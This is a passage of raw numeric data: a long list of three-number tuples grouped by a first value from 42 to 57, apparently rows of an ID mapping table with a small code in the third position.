(42, 1301, 2),
(42, 3565, 2),
(42, 3577, 2),
(42, 3579, 2),
(42, 3580, 2),
(42, 3581, 2),
(42, 3582, 2),
(42, 3583, 2),
(42, 3584, 2),
(42, 3585, 2),
(42, 3586, 2),
(42, 3587, 2),
(42, 3588, 2),
(42, 3589, 2),
(42, 4027, 2),
(42, 795, 3),
(42, 830, 3),
(42, 3578, 3),
(42, 3590, 3),
(42, 772, 6),
(42, 3546, 6),
(42, 3991, 6),
(42, 4024, 6),
(42, 774, 7),
(42, 1270, 7),
(42, 3547, 7),
(42, 3848, 7),
(42, 773, 9),
(42, 3548, 9),
(43, 772, 1),
(43, 793, 1),
(43, 1012, 1),
(43, 1020, 1),
(43, 1035, 1),
(43, 1036, 1),
(43, 1037, 1),
(43, 1039, 1),
(43, 1049, 1),
(43, 1381, 1),
(43, 1880, 1),
(43, 1881, 1),
(43, 1885, 1),
(43, 1889, 1),
(43, 2296, 1),
(43, 2298, 1),
(43, 2306, 1),
(43, 2318, 1),
(43, 2319, 1),
(43, 2320, 1),
(43, 2559, 1),
(43, 2569, 1),
(43, 2948, 1),
(43, 3563, 1),
(43, 4135, 1),
(43, 4136, 1),
(43, 4137, 1),
(43, 4138, 1),
(43, 4139, 1),
(43, 4140, 1),
(43, 4141, 1),
(43, 4142, 1),
(43, 4143, 1),
(43, 4144, 1),
(43, 4145, 1),
(43, 4146, 1),
(43, 4147, 1),
(43, 4148, 1),
(43, 4149, 1),
(43, 4150, 1),
(43, 4151, 1),
(43, 4152, 1),
(43, 4153, 1),
(43, 4154, 1),
(43, 4181, 1),
(43, 4193, 1),
(43, 4475, 1),
(43, 4476, 1),
(43, 6557, 1),
(43, 6558, 1),
(43, 6854, 1),
(43, 6855, 1),
(43, 8999, 1),
(43, 9000, 1),
(43, 9001, 1),
(43, 9003, 1),
(43, 9004, 1),
(43, 9005, 1),
(43, 9007, 1),
(43, 9008, 1),
(43, 9494, 1),
(43, 14228, 1),
(43, 14230, 1),
(43, 14704, 1),
(43, 15905, 1),
(43, 15906, 1),
(43, 15907, 1),
(43, 15908, 1),
(43, 15909, 1),
(43, 15910, 1),
(43, 15911, 1),
(43, 15912, 1),
(43, 15913, 1),
(43, 15914, 1),
(43, 15915, 1),
(43, 15916, 1),
(43, 15917, 1),
(43, 15918, 1),
(43, 15919, 1),
(43, 15920, 1),
(43, 15921, 1),
(43, 15922, 1),
(43, 16407, 1),
(43, 16408, 1),
(43, 16409, 1),
(43, 16410, 1),
(43, 16411, 1),
(43, 16412, 1),
(43, 16413, 1),
(43, 16415, 1),
(43, 16416, 1),
(43, 16417, 1),
(43, 16419, 1),
(43, 16420, 1),
(43, 16421, 1),
(43, 16538, 1),
(43, 17588, 1),
(43, 61353, 1),
(43, 61354, 1),
(43, 61355, 1),
(43, 61357, 1),
(43, 61358, 1),
(43, 61359, 1),
(43, 61360, 1),
(43, 61361, 1),
(43, 61362, 1),
(43, 61363, 1),
(43, 61364, 1),
(43, 61365, 1),
(43, 61366, 1),
(43, 61367, 1),
(43, 61368, 1),
(43, 61369, 1),
(43, 63153, 1),
(43, 66152, 1),
(43, 66153, 1),
(43, 791, 2),
(43, 797, 2),
(43, 816, 2),
(43, 817, 2),
(43, 818, 2),
(43, 819, 2),
(43, 820, 2),
(43, 821, 2),
(43, 822, 2),
(43, 825, 2),
(43, 826, 2),
(43, 827, 2),
(43, 828, 2),
(43, 829, 2),
(43, 1047, 2),
(43, 1747, 2),
(43, 3565, 2),
(43, 3577, 2),
(43, 3579, 2),
(43, 3580, 2),
(43, 3582, 2),
(43, 3584, 2),
(43, 3587, 2),
(43, 3589, 2),
(43, 6680, 2),
(43, 10223, 2),
(43, 10224, 2),
(43, 10225, 2),
(43, 10226, 2),
(43, 10227, 2),
(43, 10228, 2),
(43, 14220, 2),
(43, 773, 3),
(43, 795, 3),
(43, 823, 3),
(43, 3578, 3),
(43, 788, 4),
(43, 3557, 4),
(43, 3848, 6),
(43, 4170, 6),
(43, 4171, 6),
(43, 1270, 7),
(43, 1879, 7),
(43, 14707, 7),
(43, 1032, 8),
(43, 3548, 8),
(44, 778, 1),
(44, 797, 1),
(44, 1019, 1),
(44, 1030, 1),
(44, 1032, 1),
(44, 1039, 1),
(44, 1042, 1),
(44, 1381, 1),
(44, 1384, 1),
(44, 1389, 1),
(44, 1393, 1),
(44, 1890, 1),
(44, 2298, 1),
(44, 2306, 1),
(44, 2569, 1),
(44, 2948, 1),
(44, 3563, 1),
(44, 3565, 1),
(44, 3569, 1),
(44, 3993, 1),
(44, 4004, 1),
(44, 4043, 1),
(44, 4150, 1),
(44, 4287, 1),
(44, 4288, 1),
(44, 4289, 1),
(44, 4290, 1),
(44, 4291, 1),
(44, 4292, 1),
(44, 4293, 1),
(44, 4294, 1),
(44, 4295, 1),
(44, 4296, 1),
(44, 4297, 1),
(44, 4298, 1),
(44, 4299, 1),
(44, 8999, 1),
(44, 9000, 1),
(44, 9001, 1),
(44, 9003, 1),
(44, 9004, 1),
(44, 9005, 1),
(44, 9007, 1),
(44, 9008, 1),
(44, 9592, 1),
(44, 14216, 1),
(44, 14220, 1),
(44, 14230, 1),
(44, 14696, 1),
(44, 14700, 1),
(44, 14704, 1),
(44, 14708, 1),
(44, 14826, 1),
(44, 15791, 1),
(44, 15798, 1),
(44, 15801, 1),
(44, 15918, 1),
(44, 16018, 1),
(44, 16019, 1),
(44, 16020, 1),
(44, 16021, 1),
(44, 16022, 1),
(44, 16023, 1),
(44, 16024, 1),
(44, 16025, 1),
(44, 16026, 1),
(44, 16027, 1),
(44, 16028, 1),
(44, 16029, 1),
(44, 16030, 1),
(44, 16407, 1),
(44, 16408, 1),
(44, 16409, 1),
(44, 16410, 1),
(44, 16411, 1),
(44, 16412, 1),
(44, 16413, 1),
(44, 16416, 1),
(44, 16417, 1),
(44, 16418, 1),
(44, 16419, 1),
(44, 16420, 1),
(44, 16421, 1),
(44, 17235, 1),
(44, 773, 2),
(44, 816, 2),
(44, 817, 2),
(44, 818, 2),
(44, 819, 2),
(44, 820, 2),
(44, 821, 2),
(44, 822, 2),
(44, 823, 2),
(44, 824, 2),
(44, 825, 2),
(44, 826, 2),
(44, 827, 2),
(44, 828, 2),
(44, 829, 2),
(44, 1300, 2),
(44, 1301, 2),
(44, 3577, 2),
(44, 3579, 2),
(44, 3580, 2),
(44, 3581, 2),
(44, 3582, 2),
(44, 3583, 2),
(44, 3585, 2),
(44, 3586, 2),
(44, 3587, 2),
(44, 3588, 2),
(44, 3589, 2),
(44, 4027, 2),
(44, 795, 3),
(44, 830, 3),
(44, 3578, 3),
(44, 3584, 3),
(44, 3590, 3),
(44, 2280, 6),
(44, 4319, 6),
(44, 774, 7),
(44, 775, 7),
(44, 791, 7),
(44, 3547, 7),
(44, 3549, 7),
(44, 3868, 7),
(44, 3548, 9),
(45, 772, 1),
(45, 778, 1),
(45, 793, 1),
(45, 797, 1),
(45, 802, 1),
(45, 803, 1),
(45, 804, 1),
(45, 823, 1),
(45, 1029, 1),
(45, 1030, 1),
(45, 1031, 1),
(45, 1033, 1),
(45, 1034, 1),
(45, 1039, 1),
(45, 1049, 1),
(45, 1305, 1),
(45, 1381, 1),
(45, 1383, 1),
(45, 1384, 1),
(45, 1385, 1),
(45, 1386, 1),
(45, 1387, 1),
(45, 1388, 1),
(45, 1389, 1),
(45, 1390, 1),
(45, 1391, 1),
(45, 1396, 1),
(45, 1746, 1),
(45, 1885, 1),
(45, 1890, 1),
(45, 2298, 1),
(45, 2306, 1),
(45, 2569, 1),
(45, 2948, 1),
(45, 3548, 1),
(45, 3565, 1),
(45, 3568, 1),
(45, 3570, 1),
(45, 3571, 1),
(45, 3578, 1),
(45, 3584, 1),
(45, 4475, 1),
(45, 4476, 1),
(45, 4477, 1),
(45, 8999, 1),
(45, 9000, 1),
(45, 9001, 1),
(45, 9003, 1),
(45, 9004, 1),
(45, 9005, 1),
(45, 9007, 1),
(45, 9008, 1),
(45, 9805, 1),
(45, 14220, 1),
(45, 14230, 1),
(45, 14704, 1),
(45, 14938, 1),
(45, 14939, 1),
(45, 14941, 1),
(45, 16023, 1),
(45, 16113, 1),
(45, 16114, 1),
(45, 16115, 1),
(45, 16116, 1),
(45, 16117, 1),
(45, 16118, 1),
(45, 16119, 1),
(45, 16120, 1),
(45, 16407, 1),
(45, 16408, 1),
(45, 16409, 1),
(45, 16410, 1),
(45, 16411, 1),
(45, 16412, 1),
(45, 16413, 1),
(45, 16416, 1),
(45, 16417, 1),
(45, 16419, 1),
(45, 16420, 1),
(45, 16421, 1),
(45, 17345, 1),
(45, 61357, 1),
(45, 61358, 1),
(45, 61359, 1),
(45, 61360, 1),
(45, 61361, 1),
(45, 61362, 1),
(45, 61363, 1),
(45, 61364, 1),
(45, 61365, 1),
(45, 61366, 1),
(45, 61367, 1),
(45, 61633, 1),
(45, 773, 2),
(45, 791, 2),
(45, 1032, 2),
(45, 1035, 2),
(45, 1036, 2),
(45, 1037, 2),
(45, 788, 3),
(45, 3557, 3),
(45, 1270, 6),
(45, 3848, 6),
(45, 1374, 7),
(45, 4458, 7),
(46, 797, 1),
(46, 804, 1),
(46, 805, 1),
(46, 1015, 1),
(46, 1029, 1),
(46, 1030, 1),
(46, 1031, 1),
(46, 1033, 1),
(46, 1034, 1),
(46, 1040, 1),
(46, 1041, 1),
(46, 1381, 1),
(46, 1873, 1),
(46, 1874, 1),
(46, 1875, 1),
(46, 1890, 1),
(46, 2298, 1),
(46, 2306, 1),
(46, 2569, 1),
(46, 2948, 1),
(46, 3565, 1),
(46, 3571, 1),
(46, 4043, 1),
(46, 5237, 1),
(46, 6562, 1),
(46, 7401, 1),
(46, 7402, 1),
(46, 7403, 1),
(46, 7404, 1),
(46, 7405, 1),
(46, 7406, 1),
(46, 7407, 1),
(46, 7408, 1),
(46, 7409, 1),
(46, 7410, 1),
(46, 7411, 1),
(46, 7412, 1),
(46, 7413, 1),
(46, 7414, 1),
(46, 7415, 1),
(46, 7416, 1),
(46, 7444, 1),
(46, 8999, 1),
(46, 9000, 1),
(46, 9001, 1),
(46, 9003, 1),
(46, 9004, 1),
(46, 9005, 1),
(46, 9006, 1),
(46, 9007, 1),
(46, 9008, 1),
(46, 9678, 1),
(46, 14230, 1),
(46, 14700, 1),
(46, 14701, 1),
(46, 14702, 1),
(46, 14705, 1),
(46, 14706, 1),
(46, 14815, 1),
(46, 14816, 1),
(46, 14817, 1),
(46, 15798, 1),
(46, 16207, 1),
(46, 16208, 1),
(46, 16209, 1),
(46, 16210, 1),
(46, 16211, 1),
(46, 16212, 1),
(46, 16213, 1),
(46, 16214, 1),
(46, 16215, 1),
(46, 16216, 1),
(46, 16217, 1),
(46, 16218, 1),
(46, 16407, 1),
(46, 16408, 1),
(46, 16409, 1),
(46, 16410, 1),
(46, 16411, 1),
(46, 16412, 1),
(46, 16413, 1),
(46, 16415, 1),
(46, 16416, 1),
(46, 16417, 1),
(46, 16418, 1),
(46, 16419, 1),
(46, 16420, 1),
(46, 16421, 1),
(46, 16817, 1),
(46, 816, 2),
(46, 817, 2),
(46, 818, 2),
(46, 819, 2),
(46, 820, 2),
(46, 821, 2),
(46, 822, 2),
(46, 823, 2),
(46, 824, 2),
(46, 825, 2),
(46, 826, 2),
(46, 827, 2),
(46, 828, 2),
(46, 829, 2),
(46, 1032, 2),
(46, 1300, 2),
(46, 1301, 2),
(46, 3577, 2),
(46, 3579, 2),
(46, 3580, 2),
(46, 3581, 2),
(46, 3582, 2),
(46, 3583, 2),
(46, 3584, 2),
(46, 3585, 2),
(46, 3586, 2),
(46, 3587, 2),
(46, 3588, 2),
(46, 3589, 2),
(46, 4027, 2),
(46, 14220, 2),
(46, 795, 3),
(46, 830, 3),
(46, 3578, 3),
(46, 3590, 3),
(46, 772, 6),
(46, 774, 6),
(46, 1270, 6),
(46, 1871, 6),
(46, 3546, 6),
(46, 3547, 6),
(46, 3848, 6),
(46, 6550, 6),
(46, 773, 8),
(46, 3548, 8),
(51, 776, 1),
(51, 777, 1),
(51, 778, 1),
(51, 779, 1),
(51, 780, 1),
(51, 781, 1),
(51, 782, 1),
(51, 783, 1),
(51, 784, 1),
(51, 785, 1),
(51, 786, 1),
(51, 787, 1),
(51, 788, 1),
(51, 789, 1),
(51, 790, 1),
(51, 791, 1),
(51, 792, 1),
(51, 793, 1),
(51, 794, 1),
(51, 796, 1),
(51, 798, 1),
(51, 799, 1),
(51, 800, 1),
(51, 801, 1),
(51, 802, 1),
(51, 803, 1),
(51, 804, 1),
(51, 805, 1),
(51, 806, 1),
(51, 807, 1),
(51, 808, 1),
(51, 809, 1),
(51, 810, 1),
(51, 811, 1),
(51, 812, 1),
(51, 813, 1),
(51, 814, 1),
(51, 1032, 1),
(51, 1300, 1),
(51, 1301, 1),
(51, 1381, 1),
(51, 1890, 1),
(51, 2298, 1),
(51, 2306, 1),
(51, 2569, 1),
(51, 2948, 1),
(51, 3561, 1),
(51, 3564, 1),
(51, 3565, 1),
(51, 3573, 1),
(51, 3849, 1),
(51, 3851, 1),
(51, 3852, 1),
(51, 3853, 1),
(51, 3854, 1),
(51, 3855, 1),
(51, 3856, 1),
(51, 3857, 1),
(51, 3858, 1),
(51, 3859, 1),
(51, 3860, 1),
(51, 3861, 1),
(51, 3862, 1),
(51, 3863, 1),
(51, 3864, 1),
(51, 3865, 1),
(51, 3866, 1),
(51, 3867, 1),
(51, 3868, 1),
(51, 3869, 1),
(51, 3870, 1),
(51, 3871, 1),
(51, 3872, 1),
(51, 3873, 1),
(51, 3874, 1),
(51, 3875, 1),
(51, 3876, 1),
(51, 3877, 1),
(51, 3878, 1),
(51, 3879, 1),
(51, 3880, 1),
(51, 3881, 1),
(51, 3882, 1),
(51, 3883, 1),
(51, 3884, 1),
(51, 3885, 1),
(51, 3886, 1),
(51, 3887, 1),
(51, 3888, 1),
(51, 3889, 1),
(51, 3890, 1),
(51, 4027, 1),
(51, 4043, 1),
(51, 8999, 1),
(51, 9000, 1),
(51, 9001, 1),
(51, 9003, 1),
(51, 9004, 1),
(51, 9005, 1),
(51, 9006, 1),
(51, 9007, 1),
(51, 9008, 1),
(51, 9123, 1),
(51, 14220, 1),
(51, 14230, 1),
(51, 16407, 1),
(51, 16408, 1),
(51, 16409, 1),
(51, 16410, 1),
(51, 16411, 1),
(51, 16412, 1),
(51, 16413, 1),
(51, 16416, 1),
(51, 16417, 1),
(51, 16418, 1),
(51, 16419, 1),
(51, 16420, 1),
(51, 16421, 1),
(51, 17101, 1),
(51, 797, 2),
(51, 816, 2),
(51, 817, 2),
(51, 818, 2),
(51, 819, 2),
(51, 820, 2),
(51, 821, 2),
(51, 822, 2),
(51, 823, 2),
(51, 824, 2),
(51, 825, 2),
(51, 826, 2),
(51, 827, 2),
(51, 828, 2),
(51, 829, 2),
(51, 3548, 2),
(51, 3577, 2),
(51, 3579, 2),
(51, 3580, 2),
(51, 3581, 2),
(51, 3582, 2),
(51, 3583, 2),
(51, 3585, 2),
(51, 3586, 2),
(51, 3587, 2),
(51, 3588, 2),
(51, 3589, 2),
(51, 773, 3),
(51, 795, 3),
(51, 830, 3),
(51, 3578, 3),
(51, 3584, 3),
(51, 3590, 3),
(51, 772, 6),
(51, 774, 6),
(51, 1270, 6),
(51, 1377, 6),
(51, 3546, 6),
(51, 3549, 6),
(51, 3850, 6),
(51, 5232, 6),
(51, 12078, 6),
(51, 21009, 6),
(51, 21010, 6),
(51, 771, 7),
(51, 3545, 7),
(52, 778, 1),
(52, 793, 1),
(52, 798, 1),
(52, 1029, 1),
(52, 1032, 1),
(52, 1298, 1),
(52, 1381, 1),
(52, 1393, 1),
(52, 1889, 1),
(52, 1890, 1),
(52, 2298, 1),
(52, 2306, 1),
(52, 2569, 1),
(52, 2937, 1),
(52, 2948, 1),
(52, 3562, 1),
(52, 3563, 1),
(52, 3564, 1),
(52, 3992, 1),
(52, 3993, 1),
(52, 3994, 1),
(52, 3995, 1),
(52, 3996, 1),
(52, 3997, 1),
(52, 3998, 1),
(52, 3999, 1),
(52, 4000, 1),
(52, 4001, 1),
(52, 4002, 1),
(52, 4003, 1),
(52, 4004, 1),
(52, 4005, 1),
(52, 4006, 1),
(52, 4036, 1),
(52, 4043, 1),
(52, 5103, 1),
(52, 5104, 1),
(52, 8999, 1),
(52, 9000, 1),
(52, 9001, 1),
(52, 9003, 1),
(52, 9004, 1),
(52, 9005, 1),
(52, 9006, 1),
(52, 9007, 1),
(52, 9008, 1),
(52, 9377, 1),
(52, 14220, 1),
(52, 14230, 1),
(52, 14942, 1),
(52, 15791, 1),
(52, 15792, 1),
(52, 15793, 1),
(52, 15794, 1),
(52, 15795, 1),
(52, 15796, 1),
(52, 15797, 1),
(52, 15798, 1),
(52, 15799, 1),
(52, 15800, 1),
(52, 15801, 1),
(52, 15802, 1),
(52, 15803, 1),
(52, 15804, 1),
(52, 16407, 1),
(52, 16408, 1),
(52, 16409, 1),
(52, 16410, 1),
(52, 16411, 1),
(52, 16412, 1),
(52, 16413, 1),
(52, 16414, 1),
(52, 16415, 1),
(52, 16416, 1),
(52, 16417, 1),
(52, 16418, 1),
(52, 16419, 1),
(52, 16420, 1),
(52, 16421, 1),
(52, 797, 2),
(52, 816, 2),
(52, 817, 2),
(52, 818, 2),
(52, 819, 2),
(52, 820, 2),
(52, 821, 2),
(52, 822, 2),
(52, 823, 2),
(52, 824, 2),
(52, 825, 2),
(52, 826, 2),
(52, 827, 2),
(52, 828, 2),
(52, 829, 2),
(52, 1300, 2),
(52, 1301, 2),
(52, 3565, 2),
(52, 3577, 2),
(52, 3579, 2),
(52, 3580, 2),
(52, 3581, 2),
(52, 3582, 2),
(52, 3583, 2),
(52, 3584, 2),
(52, 3585, 2),
(52, 3586, 2),
(52, 3587, 2),
(52, 3588, 2),
(52, 3589, 2),
(52, 4027, 2),
(52, 773, 3),
(52, 795, 3),
(52, 830, 3),
(52, 3578, 3),
(52, 3590, 3),
(52, 772, 6),
(52, 1377, 6),
(52, 4024, 6),
(52, 774, 7),
(52, 1270, 7),
(52, 3547, 7),
(52, 3848, 7),
(52, 3548, 9),
(53, 778, 1),
(53, 791, 1),
(53, 797, 1),
(53, 802, 1),
(53, 803, 1),
(53, 804, 1),
(53, 1015, 1),
(53, 1029, 1),
(53, 1030, 1),
(53, 1031, 1),
(53, 1033, 1),
(53, 1034, 1),
(53, 1039, 1),
(53, 1305, 1),
(53, 1373, 1),
(53, 1382, 1),
(53, 1383, 1),
(53, 1384, 1),
(53, 1385, 1),
(53, 1386, 1),
(53, 1387, 1),
(53, 1388, 1),
(53, 1389, 1),
(53, 1390, 1),
(53, 1391, 1),
(53, 1396, 1),
(53, 1746, 1),
(53, 1890, 1),
(53, 2298, 1),
(53, 2306, 1),
(53, 2569, 1),
(53, 2948, 1),
(53, 3555, 1),
(53, 3557, 1),
(53, 3565, 1),
(53, 3571, 1),
(53, 6562, 1),
(53, 8999, 1),
(53, 9000, 1),
(53, 9001, 1),
(53, 9003, 1),
(53, 9004, 1),
(53, 9005, 1),
(53, 9007, 1),
(53, 9008, 1),
(53, 10307, 1),
(53, 14230, 1),
(53, 14701, 1),
(53, 14702, 1),
(53, 14817, 1),
(53, 14825, 1),
(53, 14935, 1),
(53, 14936, 1),
(53, 14937, 1),
(53, 14938, 1),
(53, 14939, 1),
(53, 14940, 1),
(53, 14941, 1),
(53, 14942, 1),
(53, 16407, 1),
(53, 16408, 1),
(53, 16409, 1),
(53, 16410, 1),
(53, 16411, 1),
(53, 16412, 1),
(53, 16413, 1),
(53, 16416, 1),
(53, 16417, 1),
(53, 16419, 1),
(53, 16420, 1),
(53, 16421, 1),
(53, 17458, 1),
(53, 795, 2),
(53, 816, 2),
(53, 817, 2),
(53, 818, 2),
(53, 819, 2),
(53, 820, 2),
(53, 821, 2),
(53, 822, 2),
(53, 823, 2),
(53, 825, 2),
(53, 826, 2),
(53, 827, 2),
(53, 828, 2),
(53, 829, 2),
(53, 1032, 2),
(53, 1035, 2),
(53, 1036, 2),
(53, 1037, 2),
(53, 1047, 2),
(53, 1381, 2),
(53, 1747, 2),
(53, 3577, 2),
(53, 3579, 2),
(53, 3580, 2),
(53, 3582, 2),
(53, 3587, 2),
(53, 3589, 2),
(53, 4475, 2),
(53, 4476, 2),
(53, 4477, 2),
(53, 6680, 2),
(53, 10223, 2),
(53, 10224, 2),
(53, 10225, 2),
(53, 10226, 2),
(53, 10227, 2),
(53, 10228, 2),
(53, 14220, 2),
(53, 773, 3),
(53, 830, 3),
(53, 3548, 3),
(53, 3578, 3),
(53, 3584, 3),
(53, 3590, 3),
(53, 772, 6),
(53, 1012, 6),
(53, 1013, 6),
(53, 1377, 6),
(53, 3546, 6),
(53, 5229, 6),
(53, 23091, 6),
(53, 1374, 7),
(53, 4458, 7),
(53, 14707, 7),
(54, 788, 1),
(54, 791, 1),
(54, 1020, 1),
(54, 1035, 1),
(54, 1036, 1),
(54, 1039, 1),
(54, 1381, 1),
(54, 1880, 1),
(54, 1881, 1),
(54, 1890, 1),
(54, 2288, 1),
(54, 2296, 1),
(54, 2298, 1),
(54, 2306, 1),
(54, 2318, 1),
(54, 2319, 1),
(54, 2559, 1),
(54, 2569, 1),
(54, 2948, 1),
(54, 3557, 1),
(54, 3563, 1),
(54, 4135, 1),
(54, 4136, 1),
(54, 4137, 1),
(54, 4138, 1),
(54, 4139, 1),
(54, 4140, 1),
(54, 4141, 1),
(54, 4142, 1),
(54, 4143, 1),
(54, 4144, 1),
(54, 4145, 1),
(54, 4146, 1),
(54, 4147, 1),
(54, 4148, 1),
(54, 4149, 1),
(54, 4150, 1),
(54, 4151, 1),
(54, 4152, 1),
(54, 4153, 1),
(54, 4154, 1),
(54, 4181, 1),
(54, 4193, 1),
(54, 4475, 1),
(54, 4476, 1),
(54, 6557, 1),
(54, 6558, 1),
(54, 6854, 1),
(54, 6855, 1),
(54, 8999, 1),
(54, 9000, 1),
(54, 9001, 1),
(54, 9003, 1),
(54, 9004, 1),
(54, 9005, 1),
(54, 9007, 1),
(54, 9008, 1),
(54, 9494, 1),
(54, 9495, 1),
(54, 14228, 1),
(54, 14230, 1),
(54, 14704, 1),
(54, 15905, 1),
(54, 15906, 1),
(54, 15907, 1),
(54, 15908, 1),
(54, 15909, 1),
(54, 15910, 1),
(54, 15911, 1),
(54, 15912, 1),
(54, 15913, 1),
(54, 15914, 1),
(54, 15915, 1),
(54, 15916, 1),
(54, 15917, 1),
(54, 15918, 1),
(54, 15919, 1),
(54, 15920, 1),
(54, 15921, 1),
(54, 15922, 1),
(54, 16407, 1),
(54, 16408, 1),
(54, 16409, 1),
(54, 16410, 1),
(54, 16411, 1),
(54, 16412, 1),
(54, 16413, 1),
(54, 16415, 1),
(54, 16416, 1),
(54, 16417, 1),
(54, 16419, 1),
(54, 16420, 1),
(54, 16421, 1),
(54, 16538, 1),
(54, 17588, 1),
(54, 797, 2),
(54, 816, 2),
(54, 817, 2),
(54, 818, 2),
(54, 819, 2),
(54, 820, 2),
(54, 821, 2),
(54, 822, 2),
(54, 823, 2),
(54, 825, 2),
(54, 826, 2),
(54, 827, 2),
(54, 828, 2),
(54, 829, 2),
(54, 1047, 2),
(54, 1747, 2),
(54, 3565, 2),
(54, 3577, 2),
(54, 3579, 2),
(54, 3580, 2),
(54, 3582, 2),
(54, 3584, 2),
(54, 3587, 2),
(54, 3589, 2),
(54, 6680, 2),
(54, 10223, 2),
(54, 10224, 2),
(54, 10225, 2),
(54, 10226, 2),
(54, 10227, 2),
(54, 10228, 2),
(54, 14220, 2),
(54, 795, 3),
(54, 830, 3),
(54, 3578, 3),
(54, 3590, 3),
(54, 1270, 6),
(54, 1377, 6),
(54, 3848, 6),
(54, 4170, 6),
(54, 4171, 6),
(54, 1012, 7),
(54, 1879, 7),
(54, 14707, 7),
(54, 773, 8),
(54, 1032, 8),
(54, 3548, 8),
(55, 797, 1),
(55, 804, 1),
(55, 805, 1),
(55, 1015, 1),
(55, 1029, 1),
(55, 1030, 1),
(55, 1031, 1),
(55, 1033, 1),
(55, 1034, 1),
(55, 1040, 1),
(55, 1041, 1),
(55, 1381, 1),
(55, 1873, 1),
(55, 1874, 1),
(55, 1875, 1),
(55, 1890, 1),
(55, 2298, 1),
(55, 2306, 1),
(55, 2569, 1),
(55, 2948, 1),
(55, 3565, 1),
(55, 3571, 1),
(55, 4043, 1),
(55, 5237, 1),
(55, 6562, 1),
(55, 7401, 1),
(55, 7402, 1),
(55, 7403, 1),
(55, 7404, 1),
(55, 7405, 1),
(55, 7406, 1),
(55, 7407, 1),
(55, 7408, 1),
(55, 7409, 1),
(55, 7410, 1),
(55, 7411, 1),
(55, 7412, 1),
(55, 7413, 1),
(55, 7414, 1),
(55, 7415, 1),
(55, 7416, 1),
(55, 7444, 1),
(55, 8999, 1),
(55, 9000, 1),
(55, 9001, 1),
(55, 9003, 1),
(55, 9004, 1),
(55, 9005, 1),
(55, 9006, 1),
(55, 9007, 1),
(55, 9008, 1),
(55, 9678, 1),
(55, 14230, 1),
(55, 14700, 1),
(55, 14701, 1),
(55, 14702, 1),
(55, 14705, 1),
(55, 14706, 1),
(55, 14815, 1),
(55, 14816, 1),
(55, 14817, 1),
(55, 15798, 1),
(55, 16207, 1),
(55, 16208, 1),
(55, 16209, 1),
(55, 16210, 1),
(55, 16211, 1),
(55, 16212, 1),
(55, 16213, 1),
(55, 16214, 1),
(55, 16215, 1),
(55, 16216, 1),
(55, 16217, 1),
(55, 16218, 1),
(55, 16407, 1),
(55, 16408, 1),
(55, 16409, 1),
(55, 16410, 1),
(55, 16411, 1),
(55, 16412, 1),
(55, 16413, 1),
(55, 16415, 1),
(55, 16416, 1),
(55, 16417, 1),
(55, 16418, 1),
(55, 16419, 1),
(55, 16420, 1),
(55, 16421, 1),
(55, 16817, 1),
(55, 816, 2),
(55, 817, 2),
(55, 818, 2),
(55, 819, 2),
(55, 820, 2),
(55, 821, 2),
(55, 822, 2),
(55, 823, 2),
(55, 824, 2),
(55, 825, 2),
(55, 826, 2),
(55, 827, 2),
(55, 828, 2),
(55, 829, 2),
(55, 1032, 2),
(55, 1300, 2),
(55, 1301, 2),
(55, 3577, 2),
(55, 3579, 2),
(55, 3580, 2),
(55, 3581, 2),
(55, 3582, 2),
(55, 3583, 2),
(55, 3584, 2),
(55, 3585, 2),
(55, 3586, 2),
(55, 3587, 2),
(55, 3588, 2),
(55, 3589, 2),
(55, 4027, 2),
(55, 14220, 2),
(55, 795, 3),
(55, 830, 3),
(55, 3578, 3),
(55, 3590, 3),
(55, 772, 6),
(55, 774, 6),
(55, 1270, 6),
(55, 1377, 6),
(55, 1871, 6),
(55, 3546, 6),
(55, 3547, 6),
(55, 3848, 6),
(55, 6550, 6),
(55, 24818, 6),
(55, 773, 8),
(55, 3548, 8),
(56, 778, 1),
(56, 793, 1),
(56, 798, 1),
(56, 1029, 1),
(56, 1032, 1),
(56, 1271, 1),
(56, 1298, 1),
(56, 1381, 1),
(56, 1393, 1),
(56, 1889, 1),
(56, 1890, 1),
(56, 2298, 1),
(56, 2306, 1),
(56, 2569, 1),
(56, 2937, 1),
(56, 2948, 1),
(56, 3562, 1),
(56, 3563, 1),
(56, 3564, 1),
(56, 3992, 1),
(56, 3993, 1),
(56, 3994, 1),
(56, 3995, 1),
(56, 3996, 1),
(56, 3997, 1),
(56, 3998, 1),
(56, 3999, 1),
(56, 4000, 1),
(56, 4001, 1),
(56, 4002, 1),
(56, 4003, 1),
(56, 4004, 1),
(56, 4005, 1),
(56, 4006, 1),
(56, 4036, 1),
(56, 4043, 1),
(56, 8999, 1),
(56, 9000, 1),
(56, 9001, 1),
(56, 9003, 1),
(56, 9004, 1),
(56, 9005, 1),
(56, 9006, 1),
(56, 9007, 1),
(56, 9008, 1),
(56, 9377, 1),
(56, 14220, 1),
(56, 14230, 1),
(56, 14942, 1),
(56, 15495, 1),
(56, 15791, 1),
(56, 15792, 1),
(56, 15793, 1),
(56, 15794, 1),
(56, 15795, 1),
(56, 15796, 1),
(56, 15797, 1),
(56, 15798, 1),
(56, 15799, 1),
(56, 15800, 1),
(56, 15801, 1),
(56, 15802, 1),
(56, 15803, 1),
(56, 15804, 1),
(56, 16407, 1),
(56, 16408, 1),
(56, 16409, 1),
(56, 16410, 1),
(56, 16411, 1),
(56, 16412, 1),
(56, 16413, 1),
(56, 16414, 1),
(56, 16415, 1),
(56, 16416, 1),
(56, 16417, 1),
(56, 16418, 1),
(56, 16419, 1),
(56, 16420, 1),
(56, 16421, 1),
(56, 45184, 1),
(56, 45185, 1),
(56, 45231, 1),
(56, 45232, 1),
(56, 797, 2),
(56, 816, 2),
(56, 817, 2),
(56, 818, 2),
(56, 819, 2),
(56, 820, 2),
(56, 821, 2),
(56, 822, 2),
(56, 823, 2),
(56, 824, 2),
(56, 825, 2),
(56, 826, 2),
(56, 827, 2),
(56, 828, 2),
(56, 829, 2),
(56, 1300, 2),
(56, 1301, 2),
(56, 3565, 2),
(56, 3577, 2),
(56, 3579, 2),
(56, 3580, 2),
(56, 3581, 2),
(56, 3582, 2),
(56, 3583, 2),
(56, 3584, 2),
(56, 3585, 2),
(56, 3586, 2),
(56, 3587, 2),
(56, 3588, 2),
(56, 3589, 2),
(56, 4027, 2),
(56, 795, 3),
(56, 830, 3),
(56, 3578, 3),
(56, 3590, 3),
(56, 772, 6),
(56, 1371, 6),
(56, 3546, 6),
(56, 3991, 6),
(56, 4024, 6),
(56, 5226, 6),
(56, 774, 7),
(56, 1270, 7),
(56, 3547, 7),
(56, 3848, 7),
(56, 773, 9),
(56, 3548, 9),
(57, 776, 1),
(57, 777, 1),
(57, 778, 1),
(57, 779, 1),
(57, 780, 1),
(57, 781, 1),
(57, 782, 1),
